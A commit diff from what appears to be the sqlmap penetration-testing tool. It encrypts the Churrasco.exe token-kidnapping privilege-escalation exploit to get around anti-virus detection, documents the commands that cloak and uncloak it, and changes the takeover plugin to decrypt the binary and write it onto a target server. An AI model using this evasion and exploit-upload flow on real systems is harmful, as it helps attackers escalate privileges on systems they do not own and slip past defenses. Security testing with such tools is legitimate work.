added support for cloaking Churrasco.exe file

2024-11-22 09:36:35 +03:00 · 2010-01-28 00:07:33 +00:00 · 2010-01-28 00:07:33 +00:00 · 921e449454
commit 921e449454
parent 4559ded6c1
5 changed files with 21 additions and 5 deletions
--- a/lib/contrib/tokenkidnapping/Churrasco.exe
+++ b/lib/contrib/tokenkidnapping/Churrasco.exe
--- a/lib/contrib/tokenkidnapping/Churrasco.exe_
+++ b/lib/contrib/tokenkidnapping/Churrasco.exe_
--- a/lib/contrib/tokenkidnapping/README.txt
+++ b/lib/contrib/tokenkidnapping/README.txt
@ -0,0 +1,10 @@
+Due to the anti-virus positive detection of executable stored inside this folder, 
+we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing
+has to be done prior to it's usage by sqlmap, but if you want to have access to the
+original use the decrypt functionality of the ../extra/cloak/cloak.py utility.
+
+To prepare the executable to the cloaked form use this command:
+python ../extra/cloak/cloak.py -i Churrasco.exe
+
+To get back the original executable use this:
+python ../extra/cloak/cloak.py -d -i Churrasco.exe_
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@ -26,6 +26,7 @@ import os
 import re
 from tempfile import NamedTemporaryFile

+from extra.cloak.cloak import decloak
 from lib.core.agent import agent
 from lib.core.common import fileToStr
 from lib.core.common import getDirs
@ -38,7 +39,6 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.shell import autoCompletion
-from extra.cloak.cloak import decloak
 from lib.request.connect import Connect as Request


--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -24,7 +24,9 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

 import os
 import re
+from tempfile import NamedTemporaryFile

+from extra.cloak.cloak import decloak
 from lib.core.agent import agent
 from lib.core.common import fileToStr
 from lib.core.common import getDirs
@ -45,7 +47,6 @@ from lib.takeover.metasploit import Metasploit
 from lib.takeover.registry import Registry
 from lib.techniques.outband.stacked import stackedTest

-
 class Takeover(Abstraction, Metasploit, Registry):
    """
    This class defines generic OS takeover functionalities for plugins.
@ -66,13 +67,18 @@ class Takeover(Abstraction, Metasploit, Registry):
        output = readInput(msg, default="Y")

        if not output or output[0] in ( "y", "Y" ):
-            wFile = os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe")
+            tmpFile = NamedTemporaryFile()
+            tmpFile.write(decloak(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_")))
+            tmpFile.seek(0)
            
+            wFile                 = tmpFile.name
            self.churrascoPath    = "%s/sqlmapchur%s.exe" % (conf.tmpPath, randomStr(lowercase=True))
            self.cmdFromChurrasco = True
            
            self.writeFile(wFile, self.churrascoPath, "binary", confirm=False)
            
+            tmpFile.close()
+
            return True
        else:
            return False